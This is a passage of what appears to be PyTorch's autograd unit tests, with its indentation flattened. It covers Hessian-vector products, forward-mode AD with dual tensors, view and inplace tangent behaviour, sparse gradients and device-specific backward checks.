res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
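# For a function with 1-D input and output the Jacobian is a matrix J, so
# jvp(foo, inputs, v) should equal J @ v and vjp(foo, inputs, v) should equal v @ J.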
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
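# Consistency check: the full Hessian from autogradF.hessian should agree
# with hvp (H @ v) and vhp (v^T @ H) for the same function and vector.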
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
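# Tests for the interaction between forward-mode AD (dual tensors) and
# batched gradients computed through the internal vmap machinery.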
class TestAutogradForwardModeBatchedGrad(TestCase):
def test_out_of_place_basic(self):
a = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
b = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
self.assertTrue(gradcheck(torch.sin, a, check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
self.assertTrue(gradcheck(torch.add, (a, b), check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
def test_out_of_place_not_same_layout(self):
input = torch.zeros([2, 2]).transpose(0, 1)
tangent = torch.zeros([2, 2, 2])
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
return fwAD.unpack_dual(x)[1]
x_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIsNot(x_tangent, tangent)
def test_inplace_on_view_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
base = torch.zeros([2, 2])
view = base.view_as(base)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertFalse(view_tangent._is_view()) # Optimization to share the same tensor!
self.assertIs(view_tangent, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIs(view_tangent, tangent)
def test_inplace_on_view_not_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
view = torch.zeros([2, 2]).transpose(0, 1)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIs(view_tangent._base, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIsNot(view_tangent, tangent)
def test_metadata_check_for_storage_numel_skipped(self):
# See: test_metadata_check_checks_storage_numel for the reverse of this test
primal = torch.randn(5)[:4].detach()
self.assertEqual(len(primal.storage()), 5)
tangent = torch.randn(10, 4)
def jvp(tangent):
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
_, unpacked_tangent = fwAD.unpack_dual(dual)
# No copy is made
self.assertIs(tangent, unpacked_tangent)
# as_strided raises
with self.assertRaisesRegex(RuntimeError, "can access memory outside of `tensor`"):
dual.as_strided((5,), (1,), 0)
return unpacked_tangent
torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
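# Tests for the forward-mode AD API (torch.autograd.forward_ad): dual level
# management, packing/unpacking of dual tensors, and view/inplace semantics.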
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
def test_metadata_check_checks_storage_numel(self):
primal = torch.randn(5)[:4].detach()
self.assertEqual(len(primal.storage()), 5)
tangent = torch.randn(4)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
_, unpacked_tangent = fwAD.unpack_dual(dual)
# Verify that mutating unpacked tangent does not affect the original tangent
tangent_clone = tangent.clone()
unpacked_tangent *= 2
self.assertTrue(torch.allclose(tangent_clone, tangent))
# as_strided runs without error
dual.as_strided((5,), (1,), 0)
def test_metadata_check_when_primal_has_conj_bit(self):
# Make sure the _has_same_storage_numel is a fallthrough, so that
# the conj bit does not materialize. If it materializes, it would
# cause the layout check to fail for views that do not index
# the entire storage.
a = torch.randn(2, 2, dtype=torch.cdouble).conj()
b = torch.rand_like(a)
self.assertTrue(torch.is_conj(a))
self.assertEqual(len(a.storage()), len(b.storage()))
with fwAD.dual_level():
dual = fwAD.make_dual(a, b)
dual[1:]
def test_metadata_check_when_primal_has_neg_bit(self):
# Make sure the _has_same_storage_numel is a fallthrough, so that
# the neg bit does not materialize. If it materializes, it would
# cause the layout check to fail for views that do not index
# the entire storage.
a = torch.randn(2, 2, dtype=torch.cdouble).conj().imag
b = torch.randn(2, 2, dtype=torch.cdouble).imag
self.assertTrue(torch.is_neg(a))
self.assertEqual(len(a.storage()), len(b.storage()))
with fwAD.dual_level():
dual = fwAD.make_dual(a, b)
dual[1:]
# The following tests aim to ensure all of the following behaviors:
# - the default level system in the python binding works
# - only level 0 exists and nesting is properly disabled
# - printing works fine
# - basic packing/unpacking works
# - advanced packing/unpacking works
#   - for memory / version counter sharing
#   - for backward AD (regular ops)
# - view + inplace work fine for both modes
# - we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_set_fw_grad_having_own_fw_grad_at_same_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
with self.assertRaisesRegex(RuntimeError, "has a forward gradient at the same level"):
fwAD.make_dual(baz, dual)
def test_make_dual_inference_tensor_in_inference_mode(self):
with torch.inference_mode():
foo = torch.rand(2)
bar = torch.rand(2)
foo_copy = foo.clone()
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertFalse(dual._is_view())
dual += 1
self.assertFalse(torch.allclose(foo, foo_copy))
def test_make_dual_torch_dispatch(self):
counter = [0]
class MySubclass(torch.Tensor):
def __new__(cls, data=None):
return torch.Tensor._make_subclass(cls, data)
@classmethod
def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
if func == torch.ops.aten.alias:
counter[0] += 1
with no_dispatch():
return MySubclass(torch.ops.aten.alias(*args))
with no_dispatch():
return func(*args, **kwargs)
a = torch.tensor(1.)
s = MySubclass(a)
with fwAD.dual_level():
fwAD.make_dual(s, torch.rand_like(s))
self.assertEqual(counter[0], 1)
fwAD.make_dual(torch.rand_like(s), s)
self.assertEqual(counter[0], 2)
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check unpacked dual is returned as a named tuple
# NB: Every invocation of unpack_dual returns a new tensor view
self.assertIsNot(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertEqual(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertIs(baz_tangent, fwAD.unpack_dual(baz).tangent)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual.
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also, all mentions of "non differentiable view" here mean non forward differentiable view,
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates through a view should be tracked as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_view_inplace_always_creates_a_view(self):
# See https://github.com/pytorch/pytorch/issues/67800
# The codepath may depend on the op. At the time of writing, when self is not a dual tensor
# the resulting forward grad for self for...
# - add_ has the same layout as self
# - mul_ has the same layout as other
# This is kind of fragile because the above depends on how the forward grad expression
# is written. For add and mul at least, the output inherits the layout of LHS.
# We want to handle at least these two cases.
inplace_binary_ops = ( # Add more to this list?
lambda x, y: x.add_(y),
lambda x, y: x.mul_(y),
lambda x, y: x.copy_(y),
)
for inplace_binary_op in inplace_binary_ops:
base = torch.randn(2, 2)
view = base.transpose(0, 1)
primal = torch.randn(2, 2)
tangent = torch.randn(2, 2)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
inplace_binary_op(view, dual)
# Verify that a view relationship is created for both the primal and tangent
p, t = fwAD.unpack_dual(base)
p_clone = p.clone()
t_clone = t.clone()
view *= 2
p, t = fwAD.unpack_dual(base)
self.assertTrue(torch.allclose(p_clone * 2, p))
self.assertTrue(torch.allclose(t_clone * 2, t))
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
def test_non_differentiable(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
# No differentiable outputs, shouldn't error
eq = foo == bar
# Inplace
foo.eq_(bar)
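# Sanity checks for torch.ops.aten._new_zeros_with_same_feature_meta, which creates
# a zero tensor whose feature dims mirror the target's sizes/strides/storage offset,
# optionally prepending self_num_batch_dims leading batch dims taken from the first argument.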
def test_create_new_zeros_with_same_meta(self):
new_zeroes_fn = torch.ops.aten._new_zeros_with_same_feature_meta
def check(a, b):
def assert_same_meta(t, target):
for num_bdim in range(t.dim()):
result = new_zeroes_fn(t, target, self_num_batch_dims=num_bdim)
self.assertEqual(result.dim(), target.dim() + num_bdim)
# Check size/strides match for feature dims only
for i in range(num_bdim, result.dim()):
self.assertEqual(result.size()[i], target.size()[i - num_bdim])
self.assertEqual(result.stride()[i], target.stride()[i - num_bdim])
# Check that we generate strides reasonably
if target.is_contiguous():
self.assertTrue(result.is_contiguous())
self.assertEqual(result.storage_offset(), target.storage_offset())
prod_of_t_bdims = reduce(operator.mul, t.size()[:num_bdim], 1)
self.assertEqual(len(result.storage()), len(target.storage()) * prod_of_t_bdims)
# TensorOptions are the same
self.assertEqual(result.dtype, target.dtype)
assert_same_meta(a, b)
assert_same_meta(b, a)
a = torch.randn(5, dtype=torch.float)
b = torch.randn(2, 3, 4, dtype=torch.double)
check(a, b)
# non-contiguous case
a = torch.randn(2, 3, 4).transpose(0, 1).contiguous().transpose(0, 1)
b = torch.randn(2, 3, 4)
check(a, b)
a = torch.randn(5).narrow(0, 1, 2)
b = torch.randn(2)
check(a, b)
# tensor is not a view, but still does not index the entirety of its storage
a = torch.randn(5).resize_(4)
b = torch.randn(4)
check(a, b)
# Zero-numel tensors
a = torch.randn(1, 0, 2)
b = torch.randn(1, 2)
check(a, b)
# Scalar tensor
a = torch.tensor(1.)
b = torch.randn(1, 2)
check(a, b)
def test_backward_graph_destruction(self):
def fn():
a = torch.rand(10, requires_grad=True)
da = fwAD.make_dual(torch.rand_like(a), a)
# Create an object with a c++ cycle as:
# db -> AutogradMeta -> ForwardGrad -> db's grad
# db's grad -> AutogradMeta -> MulBackward
# MulBackward -> SavedVariable -> db
db = da.exp()
with fwAD.dual_level():
fn()
# This test makes sure that we don't deadlock on exit of this
# context manager. If we do, there is most likely something wrong
# with the locking of the forward ad level.
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@skipMeta
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
def _get_cuda_memory_usage():
# we don't need to synchronize CUDA because the statistics are not tracked at
# actual freeing, but when the block is marked as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
before = _get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = _get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = _get_cuda_memory_usage()
self.assertEqual(before, after)
# TODO: see if these tests can be ported to OpInfos or moved to torch.where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
